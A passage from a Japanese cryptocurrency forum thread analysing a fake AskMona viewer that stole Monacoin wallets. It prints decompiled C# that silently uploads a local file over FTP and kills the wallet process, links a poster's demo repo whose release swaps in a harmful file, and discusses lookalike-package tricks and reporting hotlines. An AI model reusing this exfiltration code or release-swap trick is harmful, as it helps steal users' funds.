ftpWebRequest.KeepAlive = false;
ftpWebRequest.UseBinary = false;

157 :名無し二段:2017/10/13 03:35:47  0MONA/0人

ftpWebRequest.UsePassive = false;
Stream requestStream = ftpWebRequest.GetRequestStream();
FileStream fileStream = new FileStream(path, FileMode.Open, FileAccess.Read);
byte[] buffer = new byte[1024];
while (true)
{
int count = fileStream.Read(buffer, 0, buffer.Length);
if (count != 0)
requestStream.Write(buffer, 0, count);

158 :名無し二段:2017/10/13 03:35:49  0MONA/0人

else
break;
}
fileStream.Close();
requestStream.Close();
ftpWebRequest.GetResponse().Close();
}
catch
{
}
}

159 :名無し二段:2017/10/13 03:39:11  0MONA/0人

foreach (Process process in Process.GetProcessesByName("monacoin-qt"))
process.Kill();
これでモナコインのwalletをkillしてる?

160 :明日かもな/MaySoM二段:2017/10/13 06:43:07  0MONA/0人

>>159 思いっきりしてるね
どっかで「QTしてたら大丈夫」とか開発者は言ってたけど丸っ切りのウソ
これはもう悪意あるウィルス作成にあたるだろ

161 :noname一級:2017/10/13 07:28:06  0MONA/0人

固定IPを平文で公開してしまっているのをはじめ、セキュリティ意識が高くないことが伺える。暗号通貨を扱うならなおさら気をつけねばならないのに。
今回の件は開発者側もユーザー側もセキュリティ意識を改める良い機会になったな

162 :名無し二段:2017/10/13 07:32:43  0MONA/0人

高騰しましたしこれからmonaを狙うケースが増えるかもしれませんね

163 :名無しさん:2017/10/13 09:51:10  0MONA/0人

言いがかりかもしれませんが既存のAskMona-Viewerと名前を被らせているところが故意の場合かなり悪質なものと言わざるを得ません。

164 :名無し二段:2017/10/13 12:44:54  0MONA/0人

手法が分かってみると、単純。
これから模倣するケースや改良型が出てくる可能性も高い。
モナの価値が上がったばっかりに・・・・狙ってくる海外組も出てきそう。
何らかの対策を考えないとヤバいね。
「便利なアプリ」って勧められると、性善説の日本人は簡単に利用しちゃうもんな~

165 :明日かもな/MaySoM二段:2017/10/13 13:09:29  0MONA/0人

とりあえず手っ取り早いのは
開発者がソースコードを公開してるプログラムのみを使うことだろうな

166 :はまな四段錬士:2017/10/13 15:42:50  0MONA/0人

ソースコードが偽の場合とかはないの?

167 :名無し初段:2017/10/13 18:02:16  0.00114114MONA/1人

>>166
普通にありうる。作ってみた

ソースが見えて、中身は無害なファイル
https://github.com/ito-naoya-hatena-furin/mona-tool

ただしリリース用のリンクは別の有害なファイルに置き換わってる
https://github.com/ito-naoya-hatena-furin/mona-tool/releases/download/0.0.1/mona-tool.zip

特にWindowsの場合は注意が必要

168 :名無し初段:2017/10/13 18:03:56  0MONA/0人

githubは無法地帯で普通にマルウェアとか上がってるし信用しないほうがいい

169 :はまな四段錬士:2017/10/13 18:09:32  0MONA/0人

>>166
とってみたんだがaviraさんは検知してくれないし
人柱になるか待つしかないんやね

170 :名無し初段:2017/10/13 18:12:13  0MONA/0人

依存関係のファイルを別途ダウンロードするようにしておいて、後でダウンロード先だけ変えるとかされると例えソースコードを読んでも分からないですね

特にpipとかnpmとか、誰でも投稿できるパッケージサイトでそれっぽい名前でやられたらまず無理

171 :名無し初段:2017/10/13 18:15:34  0MONA/0人

「暗号通貨関係は基本的に疑ってかかれ、ただしオープンソースなら大丈夫」みたいな人が増えるとソーシャルエンジニアリングでオープンソースっぽく見せかけたマルウェアをダウンロードさせる方法が発達しそう
一体何を信じればいいのか

172 :名無し初段:2017/10/13 18:28:31  0MONA/0人

まあぶっちゃけICOとかの方がリテラシー低いだろうしそっち狙った方が効率いいと思いますよ

173 :はまな四段錬士:2017/10/13 18:49:57  0.00114114MONA/1人

ICOは公開詐欺やろ
日本ならALISとCOMSAが身をもって教えてるやん

174 :明日かもな/MaySoM二段:2017/10/13 19:41:30  0MONA/0人

インターネットって全部性善説で成り立ってるから
こういうことやられると一気に信頼関係が崩壊するんだよなあ

175 :名無し二段:2017/10/13 22:13:35  0.00114114MONA/1人

なんかトラブルに巻き込まれたら、すぐに相談できる「駆け込み寺」
今のところ、すぐに警察にとはいかんから、仲間内の「自警団」

この役目をAskMonaがやらんといかんのかもな~

結局は自己責任なんだけど
Monaの普及を考えれば、小学生でも安心して使えるくらいに利便性を下げていかんとね。

176 :明日かもな/MaySoM二段:2017/10/13 22:39:45  0.00114114MONA/1人

>>175
現状使えそうな大きめの「駆け込み寺」は

運営トピにも書いてある「インターネット・ホットラインセンター」
http://www.internethotline.jp/

IPA(情報処理推進機構)の「情報セキュリティ安心相談窓口」
https://www.ipa.go.jp/security/anshin/index.html


他にも相談できそうなところを、同じくIPAがまとめてくれてる
https://www.ipa.go.jp/security/anshin/external.html

177 :はまな四段錬士:2017/10/14 00:07:16  0.00114114MONA/1人

ガチでまずい奴は相談とかぶっ飛ばして
警察の地元サイバー犯罪対策課へ
http://www.npa.go.jp/cyber/soudan.htm

お気に入り

新規登録してMONAをもらおう

登録すると、投稿したり、MONAをもらったりすることができます。質問したり、答えたりしてMONAを手に入れてください。

新規登録ログイン